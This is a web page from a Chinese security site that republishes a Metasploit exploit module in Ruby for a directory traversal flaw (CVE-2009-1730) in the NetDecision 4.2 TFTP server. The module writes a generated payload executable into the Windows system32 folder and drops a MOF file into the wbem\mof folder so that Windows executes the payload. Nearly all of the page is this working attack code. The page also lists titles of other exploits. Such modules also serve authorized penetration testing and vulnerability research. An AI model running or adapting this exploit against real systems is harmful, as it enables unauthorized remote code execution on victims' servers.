首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NetDecision 4.2 TFTP Writable Directory Traversal Execution
来源:http://www.metasploit.com 作者:juan vazquez 发布时间:2012-08-10  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Rex::Proto::TFTP
	include Msf::Exploit::EXE
	include Msf::Exploit::WbemExec

	def initialize(info={})
		super(update_info(info,
			'Name'           => "NetDecision 4.2 TFTP Writable Directory Traversal Execution",
			'Description'    => %q{
					This module exploits a vulnerability found in NetDecision 4.2 TFTP server. The
				software contains a directory traversal vulnerability that allows a remote attacker
				to write arbitrary file to the file system, which results in code  execution under
				the context of user executing the TFTP Server.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Rob Kraus', # Vulnerability discovery
					'juan vazquez' # Metasploit module
				],
			'References'     =>
				[
					['CVE', '2009-1730'],
					['OSVDB', '54607'],
					['BID', '35002']
				],
			'Payload'        =>
				{
					'BadChars' => "\x00",
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "none"
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2', {}]
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 16 2009",
			'DefaultTarget'  => 0))

		register_options([
			OptInt.new('DEPTH', [false, "Levels to reach base directory",1]),
			OptAddress.new('RHOST', [true, "The remote TFTP server address"]),
			OptPort.new('RPORT', [true, "The remote TFTP server port", 69])
		], self.class)
	end

	def upload(filename, data)
		tftp_client = Rex::Proto::TFTP::Client.new(
			"LocalHost"  => "0.0.0.0",
			"LocalPort"  => 1025 + rand(0xffff-1025),
			"PeerHost"   => datastore['RHOST'],
			"PeerPort"   => datastore['RPORT'],
			"LocalFile"  => "DATA:#{data}",
			"RemoteFile" => filename,
			"Mode"       => "octet",
			"Context"    => {'Msf' => self.framework, "MsfExploit" => self },
			"Action"     => :upload
		)

		ret = tftp_client.send_write_request { |msg| print_status(msg) }
		while not tftp_client.complete
			select(nil, nil, nil, 1)
			tftp_client.stop
		end
	end

	def exploit
		peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"

		# Setup the necessary files to do the wbemexec trick
		exe_name = rand_text_alpha(rand(10)+5) + '.exe'
		exe      = generate_payload_exe
		mof_name = rand_text_alpha(rand(10)+5) + '.mof'
		mof      = generate_mof(mof_name, exe_name)

		# Configure how deep we want to traverse
		depth  = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
		levels = "../" * depth

		# Upload the malicious executable to C:\Windows\System32\
		print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
		upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)

		# Let the TFTP server idle a bit before sending another file
		select(nil, nil, nil, 1)

		# Upload the mof file
		print_status("#{peer} - Uploading .mof...")
		upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
	end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Solaris 10 Patch Cluster Symli
·Tunnelblick Local Root Exploit
·IBM Proventia Network Mail Sec
·Tunnelblick Local Root Exploit
·Easewe FTP (EaseWeFtp.ocx) Ins
·Spytech NetVizor v6.1 (service
·PHP IRC Bot pbot eval() Remote
·Pure-FTPd v1.0.21 (centos 6.2,
·Plixer Scrutinizer NetFlow and
·Winamp Browser Memory Corrupti
·OS X Local Root Exploit for Vi
·Oracle Business Transaction Ma
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved